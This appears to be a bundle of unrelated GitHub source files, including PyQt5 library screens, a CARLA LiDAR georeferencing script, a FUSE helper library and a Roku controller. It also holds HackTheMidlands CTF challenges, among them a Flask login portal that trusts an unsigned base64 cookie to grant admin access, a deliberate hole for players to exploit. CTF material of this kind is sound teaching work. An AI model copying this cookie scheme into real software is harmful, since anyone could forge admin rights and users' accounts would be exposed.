pixmap = QtGui.QPixmap("icons/iconEditUser.png")
pixmap3 = pixmap.scaled(400, 80, QtCore.Qt.KeepAspectRatio)
self.label.setPixmap(pixmap3)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label_6.setText(_translate("Form", "Email:"))
self.label_7.setText(_translate("Form", "Nome de usuário:"))
self.label_5.setText(_translate("Form", "Data de nascimento:"))
self.label_4.setText(_translate("Form", "Sexo:"))
self.button_cadastrar.setText(_translate("Form", "Salvar"))
self.button_cadastrar.clicked.connect(self.UpdateUser)
self.buttonResetPass.setText(_translate('Form', 'Mudar\nsenha'))
self.buttonResetPass.clicked.connect(self.changePass)
self.button_back.setText(_translate("Form", "Voltar"))
def changePass(self):
PC.pc.changePassword(PC.pc.auth.current_user['email'])
self.messageBox('Enviamos um email para você com as instruções para cadastrar uma nova senha!', 'Alerta')
def messageBox(self, textMessage, nameWin):
infoBox = QMessageBox()
infoBox.setIcon(QMessageBox.Information)
infoBox.setText(textMessage)
infoBox.setWindowTitle(nameWin)
infoBox.setStandardButtons(QMessageBox.Ok)
infoBox.exec_()
def UpdateUser(self):
erroVazio = 0
if self.lineEdit_5.text() == '':
erroVazio = 1
self.messageBox('Campos obrigatórios!', 'Erro')
if erroVazio == 0:
PC.pc.updateUser(self.lineEdit_5.text(), self.dateEdit.text(), self.comboBox.currentText())
self.messageBox('Dados atualizados!', 'Mensagem')
""" if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
Other = QtWidgets.QMainWindow()
ui = Ui_Form()
ui.setupUi(Other)
Other.show()
sys.exit(app.exec_()) """
```
#### File: BibWorld/telas/telaVerLivro.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
import PyrebaseConnector as PC
import imghdr
import sys
import os
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(577, 502)
MainWindow.setFixedSize(577, 502)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.table = QtWidgets.QTableWidget(MainWindow)
self.table.setGeometry(QtCore.QRect(190, 170, 360, 191))
self.table.setRowCount(5)
self.table.setColumnCount(2)
self.table.setItem(0, 0, QtWidgets.QTableWidgetItem("Título"))
self.table.setItem(1, 0, QtWidgets.QTableWidgetItem("ISBN"))
self.table.setItem(2, 0, QtWidgets.QTableWidgetItem("Autor Principal"))
self.table.setItem(3, 0, QtWidgets.QTableWidgetItem("Data de Publicação"))
self.table.setItem(4, 0, QtWidgets.QTableWidgetItem("Número de Páginas"))
self.table.setColumnWidth(0, 130)
self.table.setColumnWidth(1, 250)
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.table.setFont(font)
self.book = {}
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(40, 170, 131, 191))
self.label.setText("")
self.label.setPixmap(QtGui.QPixmap('images/9788544103166.jpg'))
self.label.setScaledContents(True)
self.label.setObjectName("label")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(20, 20, 541, 111))
self.label_13.setText("")
pixmap = QtGui.QPixmap("icons/iconBuscar.png")
pixmap3 = pixmap.scaled(400, 80, QtCore.Qt.KeepAspectRatio)
self.label_13.setPixmap(pixmap3)
self.label_13.setObjectName("label_13")
self.label_13.setAlignment(QtCore.Qt.AlignCenter)
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(200, 400, 87, 29))
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
self.button_back = QtWidgets.QPushButton(self.centralwidget)
self.button_back.setGeometry(QtCore.QRect(310, 400, 87, 29))
font = QtGui.QFont()
font.setFamily("KacstOne")
font.setBold(True)
font.setWeight(75)
self.button_back.setFont(font)
self.button_back.setObjectName("button_back")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 577, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.button_back.setFont(font)
self.button_back.setStyleSheet('background-color:#1f4c73')
self.pushButton.setFont(font)
self.pushButton.setStyleSheet('background-color:#1f4c73')
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "Editar livro"))
self.button_back.setText(_translate("MainWindow", "Voltar"))
def UpdateTable(self):
PC.pc.storage.child('images/books/'+str(self.book['ISBN'])).download('images/'+str(self.book['ISBN']))
typeFile = imghdr.what('images/'+str(self.book['ISBN']))
os.rename('images/'+str(self.book['ISBN']), 'images/'+str(self.book['ISBN'])+'.'+typeFile)
fileName = 'images/'+str(self.book['ISBN'])+'.'+typeFile
self.label.setPixmap(QtGui.QPixmap(fileName))
self.table.setItem(0, 1, QtWidgets.QTableWidgetItem(str(self.book['title'])))
self.table.setItem(1, 1, QtWidgets.QTableWidgetItem(str(self.book['ISBN'])))
self.table.setItem(2, 1, QtWidgets.QTableWidgetItem(str(self.book['leadAutor'])))
self.table.setItem(3, 1, QtWidgets.QTableWidgetItem(str(self.book['pubDate'])))
self.table.setItem(4, 1, QtWidgets.QTableWidgetItem(str(self.book['numPages'])))
# if __name__ == '__main__':
# app = QtWidgets.QApplication(sys.argv)
# Other = QtWidgets.QMainWindow()
# ui = Ui_MainWindow()
# ui.setupUi(Other)
# Other.show()
# sys.exit(app.exec_())
```
|
{
"source": "jedeschaud/paris_carla_simulator",
"score": 2
}
|
#### File: jedeschaud/paris_carla_simulator/L3D2_georeferencing.py
```python
import glob
import os
import numpy as np
import sys
import time
from modules import ply
SIZE_POINT_CLOUD = 10000000
DETECT_STOP_VEHICLE = True
STOP_VEHICLE_VELOCITY_NORM = 0.3 #same parameter as in npm_georef for L3D2
ADD_LIDAR_NOISE = False
SIGMA_LIDAR_NOISE = 0.03 #std dev of the Velodyne HDL32E
def main():
for i_map in [0, 1, 2, 3, 4, 5, 6]:
root_dir = "L3D2_Dataset_CARLA_v993f440b/Town0" + str(i_map+1)
folder_input = root_dir+"/generated"
folder_output = root_dir+"/georef"
# Create folders or remove files
os.makedirs(folder_output) if not os.path.exists(folder_output) else [os.remove(f) for f in glob.glob(folder_output+"/*") if os.path.isfile(f)]
file_id_point_cloud = 0
point_cloud = np.empty([SIZE_POINT_CLOUD,8], dtype = np.float32)
point_cloud_index_semantic = np.empty([SIZE_POINT_CLOUD,3], dtype = np.uint32)
index_point_cloud = 0
# Open file and read header
poses_file = open(folder_input+"/full_poses_lidar.txt", 'r')
poses_file.readline()
line_pose = np.array(poses_file.readline().split(), float)
tf = np.vstack((line_pose[:-1].reshape(3,4), [0,0,0,1]))
ts_tf = line_pose[-1]
previous_tf = tf
previous_ts_tf = ts_tf
ply_files = sorted(glob.glob(folder_input+"/frames/frame*.ply"))
start_record = time.time()
max_velocity = 0.
index_ply_file = 0
for f in ply_files:
data = ply.read_ply(f)
nbr_pts = len(data)
i = 0
while (i < nbr_pts):
while (np.abs(data[i]['timestamp']-ts_tf)>1e-4):
line_pose = np.array(poses_file.readline().split(), float)
previous_tf = tf
tf = np.vstack((line_pose[:-1].reshape(3,4), [0,0,0,1]))
previous_ts_tf = ts_tf
ts_tf = line_pose[-1]
if (np.abs(data[i]['timestamp']-ts_tf)>1e-4):
print("Error in timestamp")
sys.exit()
last_point = i
while ((last_point<nbr_pts) and (np.abs(data[last_point]['timestamp']-ts_tf)<=1e-4)):
last_point +=1
current_velocity = 0.4
if (previous_ts_tf !=ts_tf):
current_velocity = np.linalg.norm(tf[:-1,3] - previous_tf[:-1,3])/(ts_tf - previous_ts_tf)
if (current_velocity > max_velocity):
max_velocity = current_velocity
if (not(DETECT_STOP_VEHICLE) or (current_velocity > STOP_VEHICLE_VELOCITY_NORM)):
pts = np.vstack(np.array([data[i:last_point]['x'], data[i:last_point]['y'], data[i:last_point]['z'], np.full(last_point-i, 1)]))
new_pts = tf.dot(pts).T
if (ADD_LIDAR_NOISE):
vector_pose_to_new_pts = new_pts[:,:-1] - tf[:-1,3]
new_pts[:,0] = new_pts[:,0] + np.random.randn(last_point-i)*SIGMA_LIDAR_NOISE*vector_pose_to_new_pts[:,0]/np.linalg.norm(vector_pose_to_new_pts, axis=1)
new_pts[:,1] = new_pts[:,1] + np.random.randn(last_point-i)*SIGMA_LIDAR_NOISE*vector_pose_to_new_pts[:,1]/np.linalg.norm(vector_pose_to_new_pts, axis=1)
new_pts[:,2] = new_pts[:,2] + np.random.randn(last_point-i)*SIGMA_LIDAR_NOISE*vector_pose_to_new_pts[:,2]/np.linalg.norm(vector_pose_to_new_pts, axis=1)
if ((index_point_cloud+last_point-i) < SIZE_POINT_CLOUD):
point_cloud[index_point_cloud:index_point_cloud+last_point-i,:] = np.vstack([new_pts[:, 0], new_pts[:, 1], new_pts[:, 2], np.full(last_point-i, tf[0,3]), np.full(last_point-i, tf[1,3]), np.full(last_point-i, tf[2,3]), data[i:last_point]['cos'], data[i:last_point]['timestamp']]).T
point_cloud_index_semantic[index_point_cloud:index_point_cloud+last_point-i,:] = np.vstack([np.full(last_point-i, index_ply_file), data[i:last_point]['index'], data[i:last_point]['semantic']]).T
index_point_cloud += last_point-i
else:
last_temp_point = SIZE_POINT_CLOUD - index_point_cloud + i
point_cloud[index_point_cloud:index_point_cloud+last_temp_point-i,:] = np.vstack([new_pts[0:last_temp_point-i, 0], new_pts[0:last_temp_point-i, 1], new_pts[0:last_temp_point-i, 2], np.full(last_temp_point-i, tf[0,3]), np.full(last_temp_point-i, tf[1,3]), np.full(last_temp_point-i, tf[2,3]), data[i:last_temp_point]['cos'], data[i:last_temp_point]['timestamp']]).T
point_cloud_index_semantic[index_point_cloud:index_point_cloud+last_temp_point-i,:] = np.vstack([np.full(last_temp_point-i, index_ply_file), data[i:last_temp_point]['index'], data[i:last_temp_point]['semantic']]).T
field_names = ['x','y','z','x_sensor_position','y_sensor_position','z_sensor_position','cos','timestamp','index_frame','index','semantic']
ply_file_path = folder_output+"/point_cloud_%02d.ply"%file_id_point_cloud
file_id_point_cloud += 1
if ply.write_ply(ply_file_path, [point_cloud, point_cloud_index_semantic], field_names):
print("Export : "+ply_file_path)
else:
print('ply.write_ply() failed')
index_point_cloud = 0
point_cloud[index_point_cloud:index_point_cloud+last_point-last_temp_point,:] = np.vstack([new_pts[last_temp_point-i:last_point-i, 0], new_pts[last_temp_point-i:last_point-i, 1], new_pts[last_temp_point-i:last_point-i, 2], np.full(last_point-last_temp_point, tf[0,3]), np.full(last_point-last_temp_point, tf[1,3]), np.full(last_point-last_temp_point, tf[2,3]), data[last_temp_point:last_point]['cos'], data[last_temp_point:last_point]['timestamp']]).T
point_cloud_index_semantic[index_point_cloud:index_point_cloud+last_point-last_temp_point,:] = np.vstack([np.full(last_point-last_temp_point, index_ply_file), data[last_temp_point:last_point]['index'], data[last_temp_point:last_point]['semantic']]).T
index_point_cloud = last_point-last_temp_point
i = last_point
index_ply_file +=1
print("time.time()-start_record : ", time.time()-start_record)
print("Max velocity : ", max_velocity, " m/s")
poses_file.close()
if __name__ == '__main__':
main()
```
|
{
"source": "jedevc/docker-dino-demo",
"score": 2
}
|
#### File: docker-dino-demo/dino/dino.py
```python
import os
from flask import Flask, request, redirect, send_from_directory
from werkzeug.utils import secure_filename
app = Flask(__name__)
BASE = os.getcwd()
UPLOADS = os.path.join(BASE, os.environ["UPLOADS_DIR"])
@app.route("/")
def index():
return "Hello World (and dinosuars)!"
@app.route("/upload", methods=["POST"])
def upload():
if "file" not in request.files:
return "No file provided", 400
file = request.files["file"]
if file.filename == "":
return "No selected file", 400
out_filename = secure_filename(file.filename)
file.save(os.path.join(UPLOADS, out_filename))
return redirect("/dinos/" + out_filename)
@app.route("/dinos/<path:filename>")
def dinos(filename):
return send_from_directory(UPLOADS, filename)
```
|
{
"source": "jedevc/geometric-background",
"score": 3
}
|
#### File: geometric-background/rngback/generator.py
```python
from PIL import Image, ImageDraw, ImageColor
import random
import colorsys
from . import color
class Generator:
'''
Generator for a random background image.
Args:
width: The image width.
height: The image height.
columns: The number of shapes to fit along the x-axis.
rows: The number of shapes to fit along the y-axis.
offset: The internal offset of each shape.
background: The color of the image background.
foreground: The colors of the shapes in the image.
variation: The amount to vary the color of the shapes.
'''
def __init__(self, width, height, columns, rows,
offset=0, background='white', foreground='black',
blanks=True, variation=0):
self.width = width
self.height = height
self.columns = columns
self.rows = rows
self.cwidth = width / columns
self.rheight = height / rows
self.offset = offset
self.background = color.parse_color(background)
self.foreground = color.parse_colors(foreground)
self.blanks = blanks
try:
self.hvariation, self.svariation, self.lvariation = variation
except TypeError:
self.hvariation = self.svariation = self.lvariation = variation
def generate(self, seed=None):
'''
Generate an image.
Args:
seed: The initial internal state of the random generator.
Returns:
The image.
'''
if seed:
random.seed(seed)
else:
random.seed()
img = Image.new('RGB', (self.width, self.height), self.background)
drw = ImageDraw.Draw(img, 'RGBA')
for i in range(self.columns):
for j in range(self.rows):
poly = self.make_shape(i, j)
if poly:
color = self.make_color()
drw.polygon(poly, fill=color)
return img
def make_shape(self, *args):
'''
Generate the vertices of a randomly chosen shape (rectangle or
triangle).
Args: (see make_square)
Returns:
A list of the vertices of the shape or None for no shape.
'''
if self.blanks:
choice = random.randint(0, 6)
else:
choice = random.randint(1, 6)
if choice == 0:
return None
elif choice in [1, 2]:
return self.make_square(*args)
else:
return self.make_triangle(*args)
def make_square(self, x, y):
'''
Generate the vertices of a square.
Args:
x: The localized x-coordinate of the square to generate.
y: The localized y-coordinate of the square to generate.
Returns:
A list of the vertices of the square.
'''
x1 = x * self.cwidth + self.offset
y1 = y * self.rheight + self.offset
x2 = (x + 1) * self.cwidth - self.offset
y2 = (y + 1) * self.rheight - self.offset
return [(x1, y1),
(x2, y1),
(x2, y2),
(x1, y2)]
def make_triangle(self, *args):
'''
Generate the the vertices a randomly-oriented triangle.
Args: (see make_square)
Returns:
A list of the vertices of the triangle.
'''
points = self.make_square(*args)
points.remove(random.choice(points))
return points
def make_color(self):
'''
Generate a random foreground color using the provided foreground colors
and variation amounts.
Returns:
The altered color as an RGB tuple.
'''
red, green, blue = random.choice(self.foreground)
hue, lit, sat = colorsys.rgb_to_hls(red / 255, green / 255, blue / 255)
hue = int(hue * 360)
hue += random.randint(-self.hvariation / 2, self.hvariation / 2)
hue = max(0, min(hue, 360))
sat = int(sat * 100)
sat += random.randint(-self.svariation / 2, self.svariation / 2)
sat = max(0, min(sat, 100))
lit = int(lit * 100)
lit += random.randint(-self.lvariation / 2, self.lvariation / 2)
lit = max(0, min(lit, 100))
return ImageColor.getrgb(f'hsl({hue}, {sat}%, {lit}%)')
```
|
{
"source": "jedevc/HackTheMidlandsCTF19",
"score": 3
}
|
#### File: 1-login-portal/app/app.py
```python
import flask
from flask import Flask
from flask import request
import codecs
import base64
from .caller import caller, number
app = Flask("login")
app.register_blueprint(caller)
@app.route("/", methods=['GET', 'POST'])
def root():
if check_data(request.cookies.get('data'), 'issignedin'):
return flask.redirect('/verification')
resp = flask.make_response(flask.render_template('login.html'))
if 'data' not in request.cookies:
resp.set_cookie('data', create_cookie({'issignedin': 'no', 'isadmin': 'no'}))
return resp
@app.route("/login", methods=['GET', 'POST'])
def login():
params = {
'title': 'Login'
}
if check_data(request.cookies.get('data'), 'issignedin'):
return flask.redirect('/verification')
if request.method == 'GET':
args = request.args
if request.method == 'POST':
args = request.form
if 'username' in args and len(args['username']) == 0:
return flask.render_template('login.html', **params, error='invalid username')
elif 'password' in args and len(args['password']) == 0:
return flask.render_template('login.html', **params, error='invalid password')
elif 'username' in args and 'password' in args:
return flask.render_template('login.html', **params, error='incorrect login credentials')
resp = flask.make_response(flask.render_template('login.html', **params))
if 'data' not in request.cookies:
resp.set_cookie('data', create_cookie({'issignedin': 'no', 'isadmin': 'no'}))
return resp
@app.route("/logout", methods=['GET', 'POST'])
def logout():
resp = flask.make_response(flask.redirect('/'))
resp.set_cookie('data', create_cookie({'issignedin': 'no', 'isadmin': 'no'}))
return resp
@app.route("/verification", methods=['GET', 'POST'])
def verification():
if check_data(request.cookies.get('data'), 'issignedin'):
if check_data(request.cookies.get('data'), 'isadmin'):
return flask.render_template(
'secret.html',
title='identify verifier',
message='please call ' + number + ' to verify your identity'
)
else:
title = 'unauthorized access'
msg = "you're logged in, but not as the admin..."
return flask.render_template('secret.html', title=title, message=msg)
else:
return flask.render_template('base.html', error='you can\'t do that')
def check_data(d, *keys, value='yes'):
if not d:
return False
data = parse_cookie(d)
for key in keys:
if data.get(key) != value:
return False
return True
def create_cookie(cookie):
parts = []
for (key, value) in cookie.items():
parts.append(f'{key}={value}')
data = ';'.join(parts)
# data = codecs.decode(data, 'rot13')
data = base64.b64encode(data.encode('utf8'))
return data
def parse_cookie(data):
cookie = {}
data = base64.b64decode(data).decode('utf8')
# data = codecs.encode(data, 'rot13')
parts = data.split(';')
for part in parts:
key, value = part.split('=')
cookie[key] = value
return cookie
```
#### File: challenges/4-pickled-snakes/code.py
```python
import pickle
def main():
with open('flag.txt') as f:
flag = f.readline().strip()
result = [
"this file is fully encrypted using the pickled snakes method we talked about!!!",
list(enumerate(flag))
]
with open('flag.unknown', 'wb') as f:
pickle.dump(result, f)
if __name__ == "__main__":
main()
```
|
{
"source": "jedevc/hack-the-midlands",
"score": 2
}
|
#### File: hack-the-midlands/kittenkollector/views.py
```python
from . import app, get_db
import flask
@app.route('/')
def root():
return flask.render_template('index.html')
@app.route('/create')
def create_kitten():
return flask.render_template('create.html')
@app.route('/kitten')
def view_kitten():
kode = flask.request.args.get('kode')
db = get_db()
result = db.get(kode)
if result:
name, location = result
image = '/api/images/' + kode
return flask.render_template('kitten.html', kode=kode, name=name,
location=location, image=image)
else:
return '', 404
@app.route('/favicon.ico')
def favicon():
return flask.send_file('favicon.ico')
```
|
{
"source": "jedevc/qufs",
"score": 3
}
|
#### File: qufs/examples/dict.py
```python
import mafs
import json
fs = mafs.MagicFS()
fs.add_argument('file', help='json file to read from')
# read json file
with open(fs.args.file) as f:
items = json.load(f)
def dig(d, parts):
if parts:
try:
res = d.get(parts[0])
if res:
return dig(res, parts[1:])
except (KeyError, AttributeError):
return None
else:
return d
@fs.read('/*item')
def read_item(path, ps):
return str(dig(items, ps.item)) + '\n'
@fs.list('/')
def list_root(path, ps):
return items.keys()
@fs.list('/*item')
def list_item(path, ps):
return dig(items, ps.item).keys()
@fs.stat('/*item')
def stat_item(path, ps):
item = dig(items, ps.item)
if item:
if hasattr(item, 'get'):
return {'st_mode': 0o755 | mafs.FileType.DIRECTORY}
else:
return {}
raise FileNotFoundError()
fs.run()
```
#### File: qufs/examples/places.py
```python
from mafs import MagicFS
fs = MagicFS()
@fs.read('/place/here')
def place_here(path, ps):
return 'this is here\n'
@fs.read('/place/there')
def place_there(path, ps):
return 'this is there\n'
@fs.read('/place/:any')
def place_any(path, ps):
return 'this is ' + ps.any + '!\n'
@fs.readlink('/shortcut')
def shortcut(path, ps):
return './place/a quicker way'
fs.run()
```
#### File: qufs/mafs/router.py
```python
import os
from collections import namedtuple
class Router:
def __init__(self):
self.root = Node()
def add(self, route, data):
route = self._split_route(route)
self.root.add(route, data)
def lookup(self, route):
route = self._split_route(route)
result = self.root.find(route)
if result:
result.data = result.data.final
return result
def list(self, route):
route = self._split_route(route)
result = self.root.find(route)
if result:
keys = result.data.routes.keys()
keys = list(keys)
result.data = keys
return result
def _split_route(self, route):
route = os.path.normpath(route)
if route == '/':
return []
else:
route = route.strip('/')
return route.split('/')
class Node:
def __init__(self):
self.final = None
self.routes = {}
self.vroutes = {}
self.rroutes = {}
def add(self, route, data):
if route:
first, rest = route[0], route[1:]
if first.startswith(':'):
first = first[1:]
if first not in self.vroutes:
self.vroutes[first] = Node()
self.vroutes[first].add(rest, data)
elif first.startswith('*'):
first = first[1:]
if first not in self.rroutes:
self.rroutes[first] = Node()
self.rroutes[first].add(rest, data)
else:
if first not in self.routes:
self.routes[first] = Node()
self.routes[first].add(rest, data)
else:
if self.final:
raise RoutingError('node already has assigned value')
self.final = data
def find(self, route):
if route:
first, rest = route[0], route[1:]
if first in self.routes:
result = self.routes[first].find(rest)
if result:
return result
for var in self.vroutes:
result = self.vroutes[var].find(rest)
if result:
result.parameter(var, first)
return result
for var in self.rroutes:
vals = []
while rest:
vals.append(first)
result = self.rroutes[var].find(rest)
if result:
result.parameter(var, vals)
return result
first, rest = rest[0], rest[1:]
vals.append(first)
result = Result(self.rroutes[var])
result.parameter(var, vals)
return result
return None
else:
return Result(self)
class Result:
def __init__(self, data):
self.data = data
self._parameters = {}
def parameter(self, param, data):
self._parameters[param] = data
@property
def parameters(self):
Parameters = namedtuple('Parameters', self._parameters.keys())
return Parameters(**self._parameters)
class RoutingError(Exception):
pass
```
|
{
"source": "jed-frey/e200-gcc",
"score": 2
}
|
#### File: gdb/contrib/test_pubnames_and_indexes.py
```python
__author__ = '<EMAIL> (<NAME>)'
import os
import subprocess
import sys
OBJCOPY = None
READELF = None
GDB = None
def get_pub_info(filename, readelf_option):
"""Parse and return all the pubnames or pubtypes produced by readelf with the
given option.
"""
readelf = subprocess.Popen([READELF, '--debug-dump=' + readelf_option,
filename], stdout=subprocess.PIPE)
pubnames = []
in_list = False;
for line in readelf.stdout:
fields = line.split(None, 1)
if (len(fields) == 2 and fields[0] == 'Offset'
and fields[1].strip() == 'Name'):
in_list = True
# Either a blank-line or a new Length field terminates the current section.
elif (len(fields) == 0 or fields[0] == 'Length:'):
in_list = False;
elif (in_list):
pubnames.append(fields[1].strip())
readelf.wait()
return pubnames
def get_gdb_index(filename):
"""Use readelf to dump the gdb index and collect the types and names"""
readelf = subprocess.Popen([READELF, '--debug-dump=gdb_index',
filename], stdout=subprocess.PIPE)
index_symbols = []
symbol_table_started = False
for line in readelf.stdout:
if (line == 'Symbol table:\n'):
symbol_table_started = True;
elif (symbol_table_started):
# Readelf prints gdb-index lines formatted like so:
# [ 4] two::c2<double>::c2: 0
# So take the string between the first close bracket and the last colon.
index_symbols.append(line[line.find(']') + 2: line.rfind(':')])
readelf.wait()
return index_symbols
def CheckSets(list0, list1, name0, name1):
"""Report any setwise differences between the two lists"""
if len(list0) == 0 or len(list1) == 0:
return False
difference0 = set(list0) - set(list1)
if len(difference0) != 0:
print "Elements in " + name0 + " but not " + name1 + ": (",
print len(difference0),
print ")"
for element in difference0:
print " " + element
difference1 = set(list1) - set(list0)
if len(difference1) != 0:
print "Elements in " + name1 + " but not " + name0 + ": (",
print len(difference1),
print ")"
for element in difference1:
print " " + element
if (len(difference0) != 0 or len(difference1) != 0):
return True
print name0 + " and " + name1 + " are identical."
return False
def find_executables():
"""Find the copies of readelf, objcopy and gdb to use."""
# Executable finding logic follows cc-with-index.sh
global READELF
READELF = os.getenv('READELF')
if READELF is None:
READELF = 'readelf'
global OBJCOPY
OBJCOPY = os.getenv('OBJCOPY')
if OBJCOPY is None:
OBJCOPY = 'objcopy'
global GDB
GDB = os.getenv('GDB')
if (GDB is None):
if os.path.isfile('./gdb') and os.access('./gdb', os.X_OK):
GDB = './gdb'
elif os.path.isfile('../gdb') and os.access('../gdb', os.X_OK):
GDB = '../gdb'
elif os.path.isfile('../../gdb') and os.access('../../gdb', os.X_OK):
GDB = '../../gdb'
else:
# Punt and use the gdb in the path.
GDB = 'gdb'
def main(argv):
"""The main subprogram."""
if len(argv) != 2:
print "Usage: test_pubnames_and_indexes.py #"
sys.exit(2)
find_executables();
# Get the index produced by Gold--It should have been built into the binary.
gold_index = get_gdb_index(argv[1])
# Collect the pubnames and types list
pubs_list = get_pub_info(argv[1], "pubnames")
pubs_list = pubs_list + get_pub_info(argv[1], "pubtypes")
# Generate a .gdb_index with gdb
gdb_index_file = argv[1] + '.gdb-generated-index'
subprocess.check_call([OBJCOPY, '--remove-section', '.gdb_index',
argv[1], gdb_index_file])
subprocess.check_call([GDB, '-batch', '-nx', gdb_index_file,
'-ex', 'save gdb-index ' + os.path.dirname(argv[1]),
'-ex', 'quit'])
subprocess.check_call([OBJCOPY, '--add-section',
'.gdb_index=' + gdb_index_file + '.gdb-index',
gdb_index_file])
gdb_index = get_gdb_index(gdb_index_file)
os.remove(gdb_index_file)
os.remove(gdb_index_file + '.gdb-index')
failed = False
gdb_index.sort()
gold_index.sort()
pubs_list.sort()
# Find the differences between the various indices.
if len(gold_index) == 0:
print "Gold index is empty"
failed |= True
if len(gdb_index) == 0:
print "Gdb index is empty"
failed |= True
if len(pubs_list) == 0:
print "Pubs list is empty"
failed |= True
failed |= CheckSets(gdb_index, gold_index, "gdb index", "gold index")
failed |= CheckSets(pubs_list, gold_index, "pubs list", "gold index")
failed |= CheckSets(pubs_list, gdb_index, "pubs list", "gdb index")
if failed:
print "Test failed"
sys.exit(1)
if __name__ == '__main__':
main(sys.argv)
```
#### File: testsuite/gdb.python/py-pp-re-notag.py
```python
from time import asctime, gmtime
import gdb # silence pyflakes
class TimePrinter:
def __init__(self, val):
self.val = val
def to_string(self):
secs = int(self.val)
return "%s (%d)" % (asctime(gmtime(secs)), secs)
def build_pretty_printer():
pp = gdb.printing.RegexpCollectionPrettyPrinter("pp-notag")
pp.add_printer('time_t', 'time_t', TimePrinter)
return pp
my_pretty_printer = build_pretty_printer()
gdb.printing.register_pretty_printer(gdb, my_pretty_printer)
```
|
{
"source": "jed-frey/GRPython_HomeAutomation",
"score": 3
}
|
#### File: jed-frey/GRPython_HomeAutomation/PBSKids.py
```python
import roku
import time
channel_map = {"live": [0, 1], "odd_squad": [0, 0], "daniel_tiger": [1, 1], "wild_kratts": [1, 0]}
class PBSKids(roku.Roku):
def __init__(self, **kwargs):
self.roku = roku.Roku(**kwargs)
self.pbs_kids = next(a for a in self.roku.apps if a.name == "PBS KIDS")
def zero(self):
for _ in range(10):
self.left()
self.down()
def live_home(self):
self.back()
self.zero()
def home(self):
self.back(2)
self.zero()
def sleep(self, sleep_time=0.1):
time.sleep(sleep_time)
def launch(self):
self.pbs_kids.launch()
time.sleep(5)
self.zero()
def play_show(self, show):
self.launch()
for _ in range(channel_map[show][0]):
self.roku.right()
for _ in range(channel_map[show][1]):
self.roku.up()
time.sleep(2)
self.select(2)
# Practical Pressing
def left(self):
self.roku.left()
self.sleep()
def right(self):
self.roku.right()
self.sleep()
def up(self):
self.roku.up()
self.sleep()
def down(self):
self.roku.down()
self.sleep()
def select(self, times=1):
for _ in range(times):
self.roku.select()
self.sleep(2)
def back(self, times=1):
cmd = getattr(self.roku, "back")
for _ in range(times):
self.roku.select()
self.sleep(2)
if __name__ == "__main__":
import sys
print(sys.argv)
channel_map = {
"live": [0, 1],
"odd_squad": [0,0],
"daniel_tiger": [1, 1],
"wild_kratts": [1, 0],
}
if len(sys.argv)<2:
print(channel_map.keys())
sys.exit()
show = sys.argv[1]
if not show in channel_map.keys():
print(channel_map.keys())
sys.exit()
cfg = {
"host": "192.168.1.128",
"port": 8060,
"timeout": 10, # E
}
p = PBSKids(**cfg)
p.play_show(sys.argv[1])
sys.exit()
```
|
{
"source": "jed-frey/mlshim",
"score": 2
}
|
#### File: mlshim/tests/test_1.py
```python
import os
def test_3():
from mlshim import Matlab
Matlab()
def test_4():
from mlshim import Matlab
from mlshim.utils import get_versions
versions = get_versions()
for version in versions:
matlab = Matlab(version=version)
assert matlab.version == version
def test_4():
from mlshim import Matlab
from mlshim.utils import get_versions
versions = get_versions()
for version in versions:
matlab = Matlab(version=version)
matlab.run(scripts=[f"disp('Hello World: {version}');"])
```
|
{
"source": "jed-frey/opensda_flasher",
"score": 3
}
|
#### File: opensda_flasher/opensda_flasher/execlass.py
```python
from .config import read_config
class ExeClass:
"""Base class for Server and Client exe classes.
Paramemters:
config: ConfigParser configuration object.
"""
def __init__(self, config=None):
"""Exe Class init."""
if config is None:
self.config = read_config()
else:
self.config = config
self.process = None
def __del__(self):
"""Exe Class destructor."""
if self.process is not None:
try:
self.process.kill()
except BaseException:
pass
@property
def executable(self):
"""Not Implemented."""
raise NotImplementedError
@property
def cmd(self):
"""Not Implemented."""
raise NotImplementedError
def launch(self):
"""Not Implemented."""
raise NotImplementedError
```
#### File: opensda_flasher/opensda_flasher/server.py
```python
import os
import sys
import delegator
from pexpect.exceptions import EOF
from .execlass import ExeClass
class Server(ExeClass):
"""Debug server class."""
@property
def executable(self):
"""Path to server executable."""
return os.path.join(self.config["S32"]["ROOT"], "eclipse", "plugins", self.config["SERVER"]["PLUGIN"], self.config["SERVER"]["platform"], self.config["SERVER"]["EXE"])
@property
def cmd(self):
"""Command list to run."""
return [self.executable, "-startserver", "-singlesession", "-interface=OPENSDA", "-device={}".format(self.config["SERVER"]["DEVICE"]), "-serverport={}".format(self.config["SERVER"]["SERVERPORT"]), "-speed={}".format(self.config["SERVER"]["SPEED"]), "-port={}".format(self.config["SERVER"]["PORT"])]
def ports(self):
"""Print available ports."""
self.process = delegator.run([self.executable, "-showhardware"], block=True)
hardware = self.process.out.split("Done.")[-1]
return hardware.strip()
def kill(self):
"""Kill the server.
If a server is already running the task will fail. Use this to kill any
existing processes.
"""
self.process = delegator.run(["taskkill", "/f", "/im", os.path.basename(self.executable)], block=True)
def launch(self):
"""Launch debug server."""
try:
self.process = delegator.run(self.cmd, block=False)
print("Waiting for GDB servers to complete startup ...", end="")
sys.stdout.flush()
